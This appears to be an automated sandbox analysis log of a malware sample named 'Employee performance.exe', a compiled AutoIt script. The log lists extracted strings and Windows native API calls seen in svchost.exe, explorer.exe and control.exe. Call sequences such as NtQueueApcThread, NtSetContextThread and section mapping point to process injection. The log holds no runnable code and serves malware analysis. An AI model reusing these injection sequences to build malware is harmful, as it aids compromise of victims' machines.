Source: Employee performance.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e0e310cc-d

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A34B NtCreateFile,	2_2_0041A34B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A47B NtClose,	2_2_0041A47B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B60 NtClose,LdrInitializeThunk,	2_2_03572B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03572BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AD0 NtReadFile,LdrInitializeThunk,	2_2_03572AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F30 NtCreateSection,LdrInitializeThunk,	2_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FE0 NtCreateFile,LdrInitializeThunk,	2_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FB0 NtResumeThread,LdrInitializeThunk,	2_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DD0 NtDelayExecution,LdrInitializeThunk,	2_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03572DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574340 NtSetContextThread,	2_2_03574340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03574650 NtSuspendThread,	2_2_03574650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BE0 NtQueryValueKey,	2_2_03572BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572B80 NtQueryInformationFile,	2_2_03572B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572BA0 NtEnumerateValueKey,	2_2_03572BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AF0 NtWriteFile,	2_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572AB0 NtWaitForSingleObject,	2_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572F60 NtCreateProcessEx,	2_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572FA0 NtQuerySection,	2_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572E30 NtWriteVirtualMemory,	2_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572EE0 NtQueueApcThread,	2_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572D00 NtSetInformationFile,	2_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572DB0 NtEnumerateKey,	2_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C70 NtFreeVirtualMemory,	2_2_03572C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C60 NtCreateKey,	2_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572C00 NtQueryInformationProcess,	2_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CC0 NtQueryVirtualMemory,	2_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572CF0 NtOpenProcess,	2_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573010 NtOpenDirectoryObject,	2_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573090 NtSetValueKey,	2_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035735C0 NtCreateMutant,	2_2_035735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035739B0 NtGetContextThread,	2_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D70 NtOpenThread,	2_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03573D10 NtOpenProcessToken,	2_2_03573D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	2_2_0347A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347A042 NtQueryInformationProcess,	2_2_0347A042
Source: C:\Windows\explorer.exe	Code function: 3_2_118BBE12 NtProtectVirtualMemory,	3_2_118BBE12
Source: C:\Windows\explorer.exe	Code function: 3_2_118BA232 NtCreateFile,	3_2_118BA232
Source: C:\Windows\explorer.exe	Code function: 3_2_118BBE0A NtProtectVirtualMemory,	3_2_118BBE0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_052F2D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_052F2DF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_052F2DD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2C60 NtCreateKey,LdrInitializeThunk,	10_2_052F2C60
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_052F2C70
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_052F2CA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2F30 NtCreateSection,LdrInitializeThunk,	10_2_052F2F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2FE0 NtCreateFile,LdrInitializeThunk,	10_2_052F2FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_052F2EA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2B60 NtClose,LdrInitializeThunk,	10_2_052F2B60
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_052F2BE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_052F2BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2AD0 NtReadFile,LdrInitializeThunk,	10_2_052F2AD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F35C0 NtCreateMutant,LdrInitializeThunk,	10_2_052F35C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F4650 NtSuspendThread,	10_2_052F4650
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F4340 NtSetContextThread,	10_2_052F4340
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2D30 NtUnmapViewOfSection,	10_2_052F2D30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2D00 NtSetInformationFile,	10_2_052F2D00
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2DB0 NtEnumerateKey,	10_2_052F2DB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2C00 NtQueryInformationProcess,	10_2_052F2C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2CF0 NtOpenProcess,	10_2_052F2CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2CC0 NtQueryVirtualMemory,	10_2_052F2CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2F60 NtCreateProcessEx,	10_2_052F2F60
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2FA0 NtQuerySection,	10_2_052F2FA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2FB0 NtResumeThread,	10_2_052F2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2F90 NtProtectVirtualMemory,	10_2_052F2F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2E30 NtWriteVirtualMemory,	10_2_052F2E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2E80 NtReadVirtualMemory,	10_2_052F2E80
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2EE0 NtQueueApcThread,	10_2_052F2EE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2BA0 NtEnumerateValueKey,	10_2_052F2BA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2B80 NtQueryInformationFile,	10_2_052F2B80
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2AB0 NtWaitForSingleObject,	10_2_052F2AB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F2AF0 NtWriteFile,	10_2_052F2AF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F3010 NtOpenDirectoryObject,	10_2_052F3010
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F3090 NtSetValueKey,	10_2_052F3090
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F3D10 NtOpenProcessToken,	10_2_052F3D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F3D70 NtOpenThread,	10_2_052F3D70
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052F39B0 NtGetContextThread,	10_2_052F39B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA350 NtCreateFile,	10_2_032FA350
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA530 NtAllocateVirtualMemory,	10_2_032FA530
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA400 NtReadFile,	10_2_032FA400
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA480 NtClose,	10_2_032FA480
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA34B NtCreateFile,	10_2_032FA34B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FA47B NtClose,	10_2_032FA47B
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0501A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	10_2_0501A036
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05019BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	10_2_05019BAF
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0501A042 NtQueryInformationProcess,	10_2_0501A042
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05019BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	10_2_05019BB2

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0103D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0103D5EB

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01031201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_01031201

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0103E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0103E8F6

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FD8060	0_2_00FD8060
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01042046	0_2_01042046
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01038298	0_2_01038298
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0100E4FF	0_2_0100E4FF
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0100676B	0_2_0100676B
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01064873	0_2_01064873
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FDCAF0	0_2_00FDCAF0
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FFCAA0	0_2_00FFCAA0
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FECC39	0_2_00FECC39
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01006DD9	0_2_01006DD9
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FD91C0	0_2_00FD91C0
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FEB119	0_2_00FEB119
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF1394	0_2_00FF1394
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF1706	0_2_00FF1706
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF781B	0_2_00FF781B
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF19B0	0_2_00FF19B0
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FE997D	0_2_00FE997D
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FD7920	0_2_00FD7920
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF7A4A	0_2_00FF7A4A
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF7CA7	0_2_00FF7CA7
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF1C77	0_2_00FF1C77
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0105BE44	0_2_0105BE44
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF1F32	0_2_00FF1F32
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01009EEE	0_2_01009EEE
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00F93640	0_2_00F93640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E025	2_2_0041E025
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2FE	2_2_0041E2FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D593	2_2_0041D593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E4B	2_2_00409E4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EE97	2_2_0041EE97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036003E6	2_2_036003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C02C0	2_2_035C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530100	2_2_03530100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F81CC	2_2_035F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036001AA	2_2_036001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F41A2	2_2_035F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564750	2_2_03564750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C6E0	2_2_0355C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03600591	2_2_03600591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F2446	2_2_035F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4420	2_2_035E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EE4F6	2_2_035EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F6BD7	2_2_035F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360A9A6	2_2_0360A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354A840	2_2_0354A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E8F0	2_2_0356E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035268B8	2_2_035268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4F40	2_2_035B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560F30	2_2_03560F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E2F30	2_2_035E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03582F28	2_2_03582F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532FC8	2_2_03532FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354CFE0	2_2_0354CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BEFA0	2_2_035BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540E59	2_2_03540E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEE26	2_2_035FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEEDB	2_2_035FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552E90	2_2_03552E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FCE93	2_2_035FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DCD1F	2_2_035DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354AD00	2_2_0354AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353ADE0	2_2_0353ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03558DBF	2_2_03558DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540C00	2_2_03540C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530CF2	2_2_03530CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0CB5	2_2_035E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352D34C	2_2_0352D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F132D	2_2_035F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0358739A	2_2_0358739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B2C0	2_2_0355B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E12ED	2_2_035E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035452A0	2_2_035452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360B16B	2_2_0360B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352F172	2_2_0352F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357516C	2_2_0357516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354B1B0	2_2_0354B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EF0CC	2_2_035EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035470C0	2_2_035470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F70E9	2_2_035F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF0E0	2_2_035FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF7B0	2_2_035FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585630	2_2_03585630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F16CC	2_2_035F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7571	2_2_035F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DD5B0	2_2_035DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03531460	2_2_03531460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF43F	2_2_035FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFB76	2_2_035FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B5BF0	2_2_035B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357DBF9	2_2_0357DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FB80	2_2_0355FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFA49	2_2_035FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7A46	2_2_035F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B3A6C	2_2_035B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EDAC6	2_2_035EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DDAAC	2_2_035DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585AA0	2_2_03585AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E1AA3	2_2_035E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549950	2_2_03549950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B950	2_2_0355B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D5910	2_2_035D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AD800	2_2_035AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035438E0	2_2_035438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFF09	2_2_035FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03541F92	2_2_03541F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFFB1	2_2_035FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549EB0	2_2_03549EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F1D5A	2_2_035F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03543D40	2_2_03543D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7D73	2_2_035F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FDC0	2_2_0355FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B9C32	2_2_035B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFCF2	2_2_035FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347A036	2_2_0347A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347B232	2_2_0347B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03471082	2_2_03471082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347E5CD	2_2_0347E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03475B32	2_2_03475B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03475B30	2_2_03475B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03478912	2_2_03478912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D02	2_2_03472D02
Source: C:\Windows\explorer.exe	Code function: 3_2_10C8E082	3_2_10C8E082
Source: C:\Windows\explorer.exe	Code function: 3_2_10C97036	3_2_10C97036
Source: C:\Windows\explorer.exe	Code function: 3_2_10C9B5CD	3_2_10C9B5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10C8FD02	3_2_10C8FD02
Source: C:\Windows\explorer.exe	Code function: 3_2_10C95912	3_2_10C95912
Source: C:\Windows\explorer.exe	Code function: 3_2_10C98232	3_2_10C98232
Source: C:\Windows\explorer.exe	Code function: 3_2_10C92B30	3_2_10C92B30
Source: C:\Windows\explorer.exe	Code function: 3_2_10C92B32	3_2_10C92B32
Source: C:\Windows\explorer.exe	Code function: 3_2_118BA232	3_2_118BA232
Source: C:\Windows\explorer.exe	Code function: 3_2_118BD5CD	3_2_118BD5CD
Source: C:\Windows\explorer.exe	Code function: 3_2_118B1D02	3_2_118B1D02
Source: C:\Windows\explorer.exe	Code function: 3_2_118B7912	3_2_118B7912
Source: C:\Windows\explorer.exe	Code function: 3_2_118B4B32	3_2_118B4B32
Source: C:\Windows\explorer.exe	Code function: 3_2_118B4B30	3_2_118B4B30
